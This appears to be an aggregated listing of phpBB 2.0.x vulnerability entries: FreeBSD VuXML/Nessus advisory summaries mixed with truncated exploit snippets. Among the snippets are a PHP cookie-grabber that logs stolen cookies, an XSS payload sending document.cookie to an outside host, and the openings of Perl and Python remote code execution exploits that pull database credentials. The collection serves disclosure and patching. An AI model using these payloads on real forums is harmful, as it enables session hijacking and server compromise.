FreeBSD : phpbb (2258)

The following package needs to be updated: phpbb %NASLMINLEVEL 70300 C Tenable Network Security, Inc. This script contains information extracted from VuXML : Copyright 2003-2006 Jacques Vidrine and contributors Redistribution and use in source VuXML and 'compiled' forms SGML, HTML, PDF, PostScrip...

FreeBSD : phpbb -- multiple information disclosure vulnerabilities (03653079-8594-11d9-afa0-003048705d5a)

psoTFX reports : phpBB Group are pleased to announce the release of phpBB 2.0.12 the 'Horray for Furrywood' release. This release addresses a number of bugs and a couple of potential exploits. ... one of the potential exploits addressed in this release could be serious in certain situations and...

FreeBSD : phpbb -- remote PHP code execution vulnerability (4afacca1-eb9d-11d9-a8bd-000cf18bbe54)

FrSIRT Advisory reports : A vulnerability was identified in phpBB, which may be exploited by attackers to compromise a vulnerable web server. This flaw is due to an input validation error in the 'viewtopic.php' script that does not properly filter the 'highlight' parameter before calling the...

FreeBSD : phpbb -- multiple vulnerabilities (326c517a-d029-11d9-9aed-000e0c2e438a)

phpBB is vulnerable to remote exploitation of an input validation vulnerability allows attackers to read the contents of arbitrary system files under the privileges of the webserver. This also allows remote attackers to unlink arbitrary system files under the privileges of the webserver...

phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit (cookie grabber)

Exploit for unknown platform in category web applications ===================================================================== phpBB IP: ' .$ip. ' Date and Time: ' .$date. ' Referer: '.$referer.''; fclose$fp; ? //rename it to cookies.php and create one new file steal.php and chmod it to 777...

phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure (Cookie Grabber)

phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure Cookie Grabber // Original Author: 'Sjaak Rake' Ref: http://www.hackthissite.org/articles/read/175/ IP: ' .$ip. ' Date and Time: ' .$date. ' Referer: '.$referer.''; fclose$fp; ? //rename it to cookies.php and create one new file steal.p...

FreeBSD : phpBB session table exhaustion (a56a72bb-9f72-11d8-9585-0020ed76ef5a)

The includes/sessions.php unnecessarily adds session item into session table and therefore vulnerable to a denial-of-service attack. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The descriptive text and package checks in this plugin were extracted from the FreeBSD VuXML database : Copyrig...

FreeBSD : phpbb -- arbitrary command execution and other vulnerabilities (e3cf89f0-53da-11d9-92b7-ceadd4ac2edd)

The ChangeLog for phpBB 2.0.11 states : Changes since 2.0.10 - Fixed vulnerability in highlighting code very high severity, please update your installation as soon as possible - Fixed unsetting global vars - Matt Kavanagh - Fixed XSS vulnerability in username handling - AnthraX101 - Fixed not...

FreeBSD : multiple vulnerabilities in phpBB (c551ae17-7f00-11d8-868e-000347dd607f)

Users with admin rights can severly damage an phpBB installation, potentially triggered by viewing a page with a malicious link sent by an attacker. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The descriptive text and package checks in this plugin were extracted from the FreeBSD VuXML...

FreeBSD : phpbb -- privilege elevation and path disclosure (53e711ed-8972-11d9-9ff8-00306e01dda2)

The phpbb developer group reports : phpBB Group announces the release of phpBB 2.0.13, the 'Beware of the furries' edition. This release addresses two recent security exploits, one of them critical. They were reported a few days after .12 was released and no one is more annoyed than us, having to...

FreeBSD : phpbb -- Insuffient check against HTML code in usercp_register.php (4a0b334d-8d8d-11d9-afa0-003048705d5a)

Neo Security Team reports : If we specify a variable in the html code any type : hidden, text, radio, check, etc with the name allowhtml, allowbbcode or allowsmilies, is going to be on the html, bbcode and smilies in our signature. This is a low risk vulnerability that allows users to bypass...

phpBB &lt;= 2.0.16 XSS Remote Cookie Disclosure Exploit (cookie grabber)

No description provided by source. // Original Author: 'Sjaak Rake' Ref: http://www.hackthissite.org/articles/read/175/ ?php $cookie = $GET'c'; $ip = getenv 'REMOTEADDR'; $date=date"j F, Y, g:i a"; $referer=getenv 'HTTPREFERER'; $fp = fopen'cookies.txt', 'a'; fwrite$fp, 'Cookie: '.$cookie.'br IP:...

phpbb &lt;=2.0.16 bug

?php / Installation Path Disclosure Vulnerability phpBB = 2.0.16 Example: if isset$HTTPPOSTVARS'mode' || isset$HTTPGETVARS'mode' $mode = isset$HTTPPOSTVARS'mode' ? $HTTPPOSTVARS'mode' : $HTTPGETVARS'mode'; $mode = htmlspecialchars$mode; else $mode = ''; If you get url like...

phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure

phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure / 1 Change milw0rm.com to your domain.com 2 Post the below code into a new message. Example Output: ... - - 09/Jul/2005:03:09:13 -0500 "GET...

phpBB &lt;= 2.0.16 XSS Remote Cookie Disclosure Exploit

No description provided by source. / 1 Change milw0rm.com to your domain.com 2 Post the below code into a new message. Example Output: ... - - 09/Jul/2005:03:09:13 -0500 "GET...

phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit

Exploit for unknown platform in category web applications ==================================================== phpBB = 2.0.16 XSS Remote Cookie Disclosure Exploit ==================================================== / Post the below code into a new message. Example Output: ... - -...

phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure

/ 1 Change milw0rm.com to your domain.com 2 Post the below code into a new message. Example Output: ... - - 09/Jul/2005:03:09:13 -0500 "GET...

phpbb2015dad.txt

!/usr/bin/perl phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability This exploit gives the user all the details about the database connection such as database host, username, password and database name. Written by SecureD, gvr.securedgmailcom,2005 Greetings to GvR, Jumento, PP, CKrew &...

php2016.txt

From: "alex" Subject: XSS in nested tag in phpbb 2.0.16 Hi all! Example: color=EFEFEFurlwww.uturl=www.s=''style='font-size:0;color:EFEFEF'styl e='top:expressionevalthis.sss;'sss=i=new//Image;i.src='http://antic hat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=nullstyle='font-size:0;/u rl/url'/colo...

phpbb2015.py.txt

!/usr/bin/pyth0n print "\nphpBB 2.0.15 arbitrary command execution eXploit" print " 2005 by [email protected]" print " well, just because there is none." import sys from urllib2 import Request, urlopen from urlparse import urlparse, urlunparse from urllib import quote as quoteplus INITTAG =...